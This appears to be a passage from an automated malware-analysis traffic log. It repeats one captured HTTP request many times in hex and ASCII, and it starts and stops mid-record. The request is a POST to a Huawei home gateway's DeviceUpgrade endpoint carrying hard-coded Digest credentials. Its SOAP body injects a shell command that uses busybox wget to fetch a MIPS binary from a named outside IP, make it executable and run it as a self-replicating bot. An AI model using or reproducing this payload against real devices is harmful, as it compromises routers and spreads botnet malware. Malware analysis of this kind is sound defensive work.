69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 